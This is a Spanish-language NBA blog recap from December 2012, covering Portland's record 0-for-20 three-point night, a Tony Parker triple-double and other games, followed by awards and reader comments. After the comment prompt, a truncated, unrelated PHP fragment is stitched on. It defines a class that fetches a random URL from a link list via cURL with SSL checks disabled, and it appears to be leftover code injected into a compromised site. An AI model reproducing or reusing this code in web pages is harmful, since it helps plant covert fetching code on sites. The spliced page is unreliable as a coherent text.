La Crónica: Historia negativa

11 de December de 2012 por Simon

A priori no era el partido más atractivo de la jornada pero finalmente el Toronto-Portland del 10 de diciembre de 2012 será el que pasará a la historia. Primero porqué suposo la primera titularidad de Victor Claver. Las lesiones de Nicolas Batum y Wesley Matheews obligaron a Terry Stotts a tirar del español seguramente mucho antes de lo que hubiera deseado y la actuación del ex-Valencia le dio la razón. Falto de ritmo, solo anotó 2 de sus 12 lanzamientos. Segundo, y esto es lo que realmente quedará en los libros, porque los Blazers fallaron los 20 lanzamientos desde más allá del arco que intentaron, nuevo récord absoluto. Nadie había fallado tantos triples sin haber anotado ninguno. Lo gracioso es que los Raptors tampoco estuvieron muy finos y entre los 2 equipos solo anotaron 3 triples de 41 intentos. Por si eso fuera poco, Bargnani y Lowry se lesionaron durante el partido y Amir Johnson fue expulsado por obsesionarse en botar un balón tras el tiro libre de un contrario. El árbitro no estaba muy de acuerdo y así se lo hizo saber al jugador de Toronto. ¿A que os vienen ganas de visionar el partido? El partido estuvo más o menos igualado debido a la inoperancia de ambos equipos hasta el último cuarto en el que los Raptors no fueron capaces de seguir el postrero acelerón de Portland que terminaría ganando con una cómoda renta de 18 puntos (74-92). Aldridge consiguió 30 puntos y 12 rebotes y su compañero en la pintura, JJ Hickson, logró 16 puntos y 11 rebotes.

El American Airlines Arena de Miami era visitado por unos Atlanta Hawks que llegaban con una racha de 3 victorias consecutivas y 9 en los últimos diez partidos y con Josh Smith nombrado recientemente como “jugador de la semana en el Este”.  El partido comenzó  muy igualado en los dos primeros cuartos, con Atlanta consiguiendo responder bien a las acometidas de los Heat apoyados en unos buenos Josh Smith y Al Horford, pero fue en el tercer cuarto cuando Miami consiguió asfixiar definitivamente el ataque de los Hawks con su característica defensa agresiva de las líneas de pase y la distancia se amplió hasta el arco de los 8 puntos de forma definitiva. James y Wade estuvieron increíblemente eficientes en el partido de ayer, 53 puntos entre ambos con un 10/16 y 11/13 de campo respectivamente. Además los Heat como equipo lanzaron un 58% en tiros de campo que quedó muy cerca del flojo 63% que consiguieron desde la línea de tiros libres. Bosh ayudó con un doble doble ( 14-10 ).  Una buena victoria para los Heat que dominaron con suficiencia el partido ante un rival “directo” por la conferencia Este (92-101).

En Texas, los Spurs visitaban Houston para enfrentarse a los Rockets. Los de Popovich necesitaron de una prórroga para vencer a unos Rockets sin su estrella James Harden. El partido transcurrió igualado durante todo el tiempo reglamentario con un ritmo de anotación altísimo (empate a 120 al final del último cuarto). San Antonio apoyó su victoria en un grandioso Tony Parker que consiguió el primer triple doble de su carrera con 27 puntos 12 rebotes y 12 asistencias y estuvo acompañado por un grandísimo Gary Neal con 29 puntos (7 de 9 en triples) y un Manu Ginobili (22-5-6 ) que está mejorando su renqueante comienzo de temporada. Con ese trío los Spurs lograron sobreponerse al mal partido de Tim Duncan, 10 puntos y 13 rebotes pero un paupérrimo 1 de 9 en tiros de campo. En Houston volvió la Linsanity de la temporada pasada pues Jeremy estuvo desatado durante toda la noche y acabó con 38 puntos y una serie de canastas muy meritorias pero no pudo llevar a su equipo a la victoria.Los Spurs decantaron muy pronto la prórroga a su favor gracias a su mayor experiencia y saber hacer en momentos decisivos en los que Houston jugó muy acelerado e impreciso. Asik cuajó un gran partido 21 puntos y 10 rebotes secando además a Tim Duncan. (134-126).

En Charlotte, la victoria fue para unos Golden State Warriors que siguen firmando una gran temporada y que consiguieron  su 4 victoria consecutiva de forma muy cómoda. Un partido que iba para paliza con los Warriors 18 arriba al descanso. Charlotte consiguió recortar algo en el 3 periodo pero una gran ráfaga de Warriors volvió a aumentar la ventaja a 20 puntos al inicio del último cuarto. Los Bobcats consiguieron maquillar el resultado en el último cuarto pero nunca se acercó  a la posibilidad de remontada. Los Warriors fueron liderados por los de siempre, Stephen Curry y David Lee, con 27 y 25 puntos respectivamente, bien acompañados desde el banco por Jarret Jack y Carl Landry. En los Bobcats el mejor fue Kemba Walker con 24 puntos. Crisis absoluta para el equipo de Jordan que tras un gran inicio de temporada ahora han perdido 8 partidos seguidos dejando imágenes que nos recuerdan más a la pasada temporada que al inicio de esta ( 104-96).

Anoche, vía twitter os presentábamos un dato revelador de Jrue Holiday: el 42’8% de los puntos de su equipo son generados por él vía puntos o asistencias. Líder de la liga por delante de Rajon Rondo y Lebron James. Si alguien vio el partido de ayer de los Sixers no tendrá duda de que el dato ha de ser correcto. El base anotó 25 puntos y repartió 8 asistencias pero lo más importante 12 de sus puntos llegaron en el último cuarto cuando el balón más quema. Evan Turner fue su escudero perfecto con 18 puntos, 11 rebotes y 7 asistencias. Queda claro que estos 2 no tienen intención de seguir esperando a Bynum. Por los Pistons, Monroe, Knight y poco más (97-104).

Finalmente, en Dallas, un parcial de 31-3 en la primera parte dejó en bandeja de plata la victoria a los tejanos. Los de Sacramento se estrellaron una y otra vez contra ls dura defensa de los Mavs y en 11 minutos perdieron 9 balones y fallaron 12 tiros. La 2ª parte fue un paseo militar. OJ Mayo volvió a ser el mejor de los suyos con 19 puntos y 7 rebotes mientras que en Sacramento un renacido Francisco García, autor de 7 triples, y Demarcus Cousins fueron los que más dieron la cara (96-119).

PREMIOS

MVP: Los 2 mejores jugadores del día pisaron la misma cancha. El que ganó, Tony Parker, se lleva nuestro MVP gracias a sus 27 puntos, 12 rebotes y 12 asistencias. Cerca se quedan los 30 puntos y 12 asistencias de Lamarcus Aldridge.

Rookie: Michael Kidd-Gilchrist sigue demostrando que es un jugador total. Derrota de su equipo pero buena actuación con 17 puntos, 7 rebotes y 3 asistencias.

Sorpresa: Francisco García ha recuperado la titularidad en los Kings y ayer cuajó un gran partido. 25 puntos con un 7 de 9 en triples para el dominicano.

Decepción: El partido Toronto-Portland en general y el récord negativo de los Blazers en particular.

Esfuerzo en vano: Una de las mejores actuaciones que recuerdo que se quedan sin recompensa. Jeremy Lin se fue a los 38 puntos con un gran 11 de 21 en tiros y aportó además 7 asistencias, 3 rebotes, 2 robos y 2 tapones.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

25 comentarios a esta entrada

  1. txusma dice:
    #1

    Dos comentarios rápidos de las 10 mejores jugadas:
    – ¡Qué bueno es Stephen Curry! ¡Qué talento!
    – Gilipollez la asistencia en la 2ª jugada. Hacía falta ese pase a Lebron?

      Citar

  2. Chipi dice:
    #2

    A mí me parece que Claver no tiene nivel para la NBA, pero me gustaría que le fueran bien las cosas allí. Por eso veo importante que no se corte un pelo y tire 12 veces a canasta.

    Por otra parte, no sé por qué tenía asociado a Tony Parker con el hecho de hacer más triples dobles, tipo Rondo o Kidd. Me sorprende muchísimo que sea el primero de su carrera.

      Citar

  3. max dice:
    #3

    Vaya risas con lo de Amir Johnson y el árbitro luchando por el rebote…… No sé que pretendía Johnson…. Y encima le lanza el protector bucal al árbitro cuando este ya le había echado. Que bueno!!

      Citar

  4. Sancho88 dice:
    #4

    Buena crónica Simón, una currada buenísima. Fíjate, los Heat es que no aflojan ni un pelo. La semana pasada les veíamos pinchar contra Wizards y Knicks, pero han vuelto a meter la directa, y a pesar de que la defensa no está en modo playoffs, están robando balones como locos, jugando más rápido que nunca y anotando canastas super sencillas. NORRIS COLE, para mí es también una sorpresa, no de esta noche, sino de lo que llevamos de mes de diciembre. Se adapta mucho más al juego rápido de los Heat que Chalmers, porque es un base más rápido y está en mejor forma que el propio Chalmers, muy castigado por las lesiones hasta ahora. Estaría bien que algún día Spoelstra lo sacara de titular. Ya digo, los Heat son los mejores en tiros de campo hasta el momento (junto con los Thunder si mal no recuerdo), gracias a los robos y canastas fáciles. Además, en triples también se dan la mano ambos equipos. De momento, siendo fríos y realistas, no habría por qué poner en duda a los nuevos Thunder sin James Harden, para mí siguen estando un puntito por encima de San Antonio, Memphis y Clippers (muchísimo ojito con estos últimos con un Blake Griffin en modo MVP).

    Creo que si habría que apostar ahora para la final de la NBA, Thunder contra Heat como el año pasado sería mi apuesta. Lo de Lebron es escandaloso, y lo de Wade también. Muchos dudan siemper de Wade y anteponen a Bryant y Harden, pero ojito porque lo bueno de Wade es que va a saber guiar al equipo en momentos decisivos, poniendo a Allen y distribuyendo él el juego, ese es el gran secreto de los Heat para este año. Creo que son favoritísimos.

    Sobre los Kings, no los he podido ver, pero me sorprende lo de Francisco García, supongo que será puntual, no creo que repita un partido así… a Tyreke lo están reservando (no sé muy bien para que), y en los Bobcats MKG es simplemente imparable. Decían que no podía progresar, que su techo no era muy alto… las pelotas, está aprendiendo a tirar desde fuera, a mí este tío me da miedo para el futuro, es un Rodman en potencia

      Citar

  5. Sancho88 dice:
    #5

    Y por cierto, lo de Claver es de risa auténticamente… menos mal que al menos ganaron sus Blazers, aunque está visto que a los Raptors de ahora les ganan hasta los Bobcats del año pasado. Para mí, la clave del bajón de los Bobcats es que Dunlap aún no se ha dado cuenta de que Jeff Taylor tan solo era una solución de emergencia ante la baja de Henderson. Debería sacarlo de titular a Henderson y que se rotase con Ben Gordon, y debería jugar mucho más Ramon Sessions. Las victorias de los Cats llegan con Kemba-Sessions en la pista. A ver si se da cuenta de esto el mister… siguen siendo un equipo atractivo de ver, que si creen en sí mismos aún podrían pelear por cosas en el Este, pero hace falta cambiar algunas piezas y las rotaciones sobre todo

      Citar

  6. GreenPride dice:
    #6

    Bueno de anoche vi el Heat-Hawks. Los Hawks llegaban enrachados gracias a un calendario beneficioso y a su buen juego y en los dos primeros cuartos dieron muestras de ese buen juego. Buen movimiento de balón, Smith y Horford enchufados y un muy buen base como Jeff Teague para poner problemas a los de Miami. Sin embargo cuando a LeBron se le une Wade es casi imposible detener a los Heat y en el segundo tiempo vi el mejor Wade que he visto en mucho tiempo. Por fin lanzando de media-larga distancia con confianza y aprovechando para anotar en cortes y entradas. Con Wade a ese nivel y como siempre con LeBron magnífico estoy de acuerdo con Sancho88 en que son superfavoritos al anillo. Los Hawks ganarán partidos pero sigo viéndoles un equipo falto de chispa para la hora de los PO.
    Del resto destacar el gran partido de Houston con Lin por fin justificando lo que se le paga y Asik haciendo un gran partido aunque insuficiente ante unos Spurs que se las saben todas y siempre tienen recursos para acabar ganando.
    Y sintiéndolo mucho no veo a Claver como NBA. Tiene físico pero no fue un jugador dominante en Europa y no creo que llegue a ser ni de rotación en NBA. Yo creo que debería volver a Europa que todavía es joven y buscar un equipo donde de verdad le den el papel decisivo y ver si llega a ser el jugador que todos creen que puede llegar a ser por condiciones

      Citar

  7. Ruxixón dice:
    #7

    Y en los Bobcats también llama la atención que haya puesto a Biyombo de 4 desplazando a Mullens al 5,cuando siempre ha sido Mullens-Haywood la pareja interior.Además Haywood sólo ha jugado 3 minutos,raro cuanto menos,más si se le suma la rotación extraña sentando a Mullens-Haywood recientemente para dar entrada a Biyombo-Diop recientemente.¿Está tocado Haywood?¿Alguien sabe algo?

    Lo de los Blazers es la manifestación de lo que se viene diciendo,no hay que ser un lumbreras tampoco,el peor banquillo de la NBA,han faltado dos jugadores en las alas y a pesar de haber ganado los números están ahí.Lo de Toronto es triste,muy triste,debería ser el primer equipo que se mueva en el mercado con Bargnani/Calderón ¿+ alguien más?

      Citar

  8. Rompe dice:
    #8

    Lo de LeBron es increíble. Cuánto ha pasado desde su último partido realmente malo?? Siempre siempre da el callo, en las victorias y en las derrotas, siempre se mantiene en sus números…

      Citar

  9. Esteban dice:
    #9

    Soy el unico q cree q los bobcats estan tirando a menos? No eran extraordinarios, pero los minutos de Diop y Biyombo llaman mucho la atencion…

      Citar

  10. Esteban dice:
    #10

    Rompe, lebron esta a otro nivel del resto de la liga, incluso su peor partido, sigue siendo la figura de la cancha

      Citar

  11. Esteban dice:
    #11

    Bargnani y calderon por pau, a mi me cierra y mucho

      Citar

  12. Sancho88 dice:
    #12

    Esteban:
    Soy el unico q cree q los bobcats estan tirando a menos? No eran extraordinarios, pero los minutos de Diop y Biyombo llaman mucho la atencion…

    Yo creo que necesitan a Sessions para liberar a Kemba de la labor de creación. Ese no es el juego de Kemba y Sessions ahí se le nota un poquito mejor, es ese el problema, en los Bobcats falta coordinación para hacer los ataques más claros.

      Citar

  13. Sancho88 dice:
    #13

    Desde la vuelta de Henderson ha bajado su aportación en minutos a de 27 a 23, y eso quieras que no se nota. O al menos, esa es mi impresión

      Citar

  14. Esteban dice:
    #14

    Sancho88:
    Desde la vuelta de Henderson ha bajado su aportación en minutos a de 27 a 23, y eso quieras que no se nota. O al menos, esa es mi impresión

    la vuelta de henderson no deberia ser un problema, sino una opcion mas en ofensiva, pero es cierto que sin el, dunlap encontro a taylor, un gran defensor y grata sorpresa y armo la rotacion exterior con kemba, taylor, sessions y gordon, y la llegada de henderson termina complicando a dunlap, mas de lo que le soluciona

      Citar

  15. Sancho88 dice:
    #15

    En realidad, Henderson, tal y como tiene estructurado Bobcats la plantilla, no tiene demasiado sentido. Mullens+Henderson x Bargnani+Ed Davis podría ser?

      Citar

  16. nba dice:
    #16

    Esteban:
    Bargnani y calderon por pau, a mi me cierra y mucho

    Yo creo que si alguien quiere quitar el expiring de Calderon a Toronto igual se tiene que tragar el contrato de Amir, pero que paquete esta hecho,
    un Bargiani+Calderon+Amir por Pau-Ebanks-Hill+Duhon estaria bien, no seria un robo para nadie y propiciaria un cambio de dinamica en las dos franquicias
    yo a Kleiza lo mantendría en Toronto, ya que al menos tiene mas luces que Amir

      Citar

  17. Esteban dice:
    #17

    nba el trade seria:

    los raptors dan a bargnani (10 millones) y calderon (10 millones) y reciben a pau (20 millones)

    los lakers dan a pau y reciben a bargnani, y ahi debe entrar un tercer equipo que quiera los 10 millones en expiring de calderon y darle a los lakers algunos jugadores por ese precio

    magic? glen, harrington, turkglu, etc

      Citar

  18. rumbero dice:
    #18

    Hombre lo de Biyombo tiene su lógica teniendo en cuenta que es el pick 7 el año pasado. Por mucho que Haywood no lo estuviera haciendo mal hay que foguear al chaval para ver si entre él, Kemba y Kidd-Glischrist (yo también creo que tiene una pinta tremenda) pueden montar algo realmente serio. Y si, estos Bobcats han jugado mejor con más minutos de Sessions y Walker más liberado. A Taylor hay que bajarle por narices ese estatus de buen defensor con el lio que le hace Curry.
    Por cierto muy bien estos Warriors. No han tenido un calendario especialmente dificil pero la temporada anterior no hubieran ganado 4 partidos de visitante ni de coña. Curry es un auténtico jugón y Lee está jugando realmente bien. Además Thompson parece que se ha recuperado un poco de la pájara que le entró hace unas semanas y como se preveía Landry y Jack han venido a sumar. Y falta Bogut. A ver que pasa cuando vengan rivales más duros del oeste, pero los Warriors molan

      Citar

  19. Esteban dice:
    #19

    hemos asistido a muchas reivindicaciones en estos años, de los supuestos HACE-NUMEROS, aceptables jugadores que solo hacen numeros en equipos malos

    no hace mas de 3 años, su amnistia a esa categoria la consiguio zach randholph, liderando a menphis

    el año pasado el honor fue para al jefferson, callando las criticas que recibio a lo largo de toda su carrera

    este es el año para david lee, liderando a los warriors a un nivel all-star

    son casos tipicos de que en un lugar adecuado es diferente la caso a un lugar inadecuado, tal podria ser el caso de bargnani

      Citar

  20. Esteban dice:
    #20

    un caso similar, a mucho menos nivel, pero que demuestra que un tio puede ser PESIMO como jugador “franquicia” o intento de ello, y que cumpliendo un rol n un equipo lejano a ser el lider, puede cambiar toda su carrera, es el de ANDREW BLATCHE

      Citar

  21. Esteban dice:
    #21

    jajaja en mi analisis de los NETS, dije que el factor X de los nets era gerald wallace, que era capaz de detener a los lebron, pierce y melo…

    bueno, no he acertado, melo se fue a los 35 en el partido pasado y hoy ya va 41 y falta un trecho… jeje sion dudas no he estado acertado jeje

      Citar

  22. Esteban dice:
    #22

    la ruta de 5 de los lakers por el este, este es el primero no?

    diestro dice:
    10.12.12 a las 16:12
    #18
    Esteban: … por mi dudo que ganen 2 juegos, y aseguro que no ganaran mas de 2 de los proximos 5 de visitante

    Yo sin tener los conocimientos sobre baloncesto del amigo Esteban, apuesto porque ganan 3 partidos como mínimo, de los 5 seguro. Es más apostaría incluso que ganarán 4 incluido el del Madison, y que se dejaran otro de los partidos supuestamente más asequibles.

    bueno diestro deberan ganar los 4

      Citar

  23. Esteban dice:
    #23

    melo candidatazo al MVP, sencillamente indetenible a la hora de anotar

      Citar

  24. HisRoyalAirness dice:
    #24

    We-want-Phil!!

      Citar

  25. diestro dice:
    #25

    Kobe 42 puntos con 16/28 y Howard 19-20, pero Hill, Morris, Duhon y Ebanks 4 puntos en 72 minutos de juego totales.
    Sigo pensando que si la lesión de Gasol era real, y se ha podido recuperar con estos partidos de descanso, van a empezar a ganar en cuanto vuelva.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>